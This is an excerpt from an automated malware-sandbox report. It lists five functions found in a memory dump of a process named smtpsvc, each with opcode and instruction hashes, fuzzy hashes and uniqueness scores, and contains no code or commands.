                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.463765468.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_1e0000_smtpsvc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fb4638e905923db92764cdd6249293e0edf939bd686f1f55b5f531746f50df39
                                                        • Instruction ID: 0779b1f9ab5b86c8a2d8718b882be3f6143c79929f5a7e96810970603919391e
                                                        • Opcode Fuzzy Hash: fb4638e905923db92764cdd6249293e0edf939bd686f1f55b5f531746f50df39
                                                        • Instruction Fuzzy Hash: 3CE0D8B0C082589FCB40EFB95D454DDBFF0EE05340B1146AAD84AE7202E2748711CFD1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 001E077C Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.463765468.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_1e0000_smtpsvc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3fd5573c61a1d46aa816f14d10203a191929c58e9da93439d078a8408908af1a
                                                        • Instruction ID: a1628127b4f7f1af71a9c65f89c3d9909780d6a2ee3eddd3817531eb1cc38cd5
                                                        • Opcode Fuzzy Hash: 3fd5573c61a1d46aa816f14d10203a191929c58e9da93439d078a8408908af1a
                                                        • Instruction Fuzzy Hash: F6F08C70A00751CFEB15DFA1C44879D7BF0AF48318F240859D002AB3A2CBB44CC4CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 001E12A0 Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.463765468.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_1e0000_smtpsvc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a3b6ede106c92387391f7d49d37cefa39d0606778adb4907715579ce9a82d02
                                                        • Instruction ID: 9d60f6d2d909da7bf7a352725253fadf09f38f31572fe7e21d925f79f70207e6
                                                        • Opcode Fuzzy Hash: 0a3b6ede106c92387391f7d49d37cefa39d0606778adb4907715579ce9a82d02
                                                        • Instruction Fuzzy Hash: A4E02C32A004009FC320EBB8FD0AA8A3BA4AF44600F1081A8E60AEB260D779C8108B80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 001E12A8 Relevance: .0, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.463765468.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_1e0000_smtpsvc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d1e611aba63e29b8024d7b5d35d55509ee7d2bced7db3cc6cbb3c12c704b763c
                                                        • Instruction ID: a96951e58c701582f92b93a552bfbddc0129899038afecde5e78a6fe684b4f97
                                                        • Opcode Fuzzy Hash: d1e611aba63e29b8024d7b5d35d55509ee7d2bced7db3cc6cbb3c12c704b763c
                                                        • Instruction Fuzzy Hash: 52D02B317005109FC310EF79EC08A4A3BB8EF45611F104060E608CF250DB31DC00C7D0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 001E0488 Relevance: .0, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.463765468.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_1e0000_smtpsvc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5dcfa0fdb201991792ec2c53a1b1dcf1e4a5953a260e39f82c6e2fbb8a412c07
                                                        • Instruction ID: 2890410d640a7ed5aa36f0793b98056233d1ff81cfcfa18987b8a9e3a02ceeb0
                                                        • Opcode Fuzzy Hash: 5dcfa0fdb201991792ec2c53a1b1dcf1e4a5953a260e39f82c6e2fbb8a412c07
                                                        • Instruction Fuzzy Hash: F5D067B1D042299F8B40EFB999051DEBBF8EA08650B514566DA1AE7204E7745A108BD1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%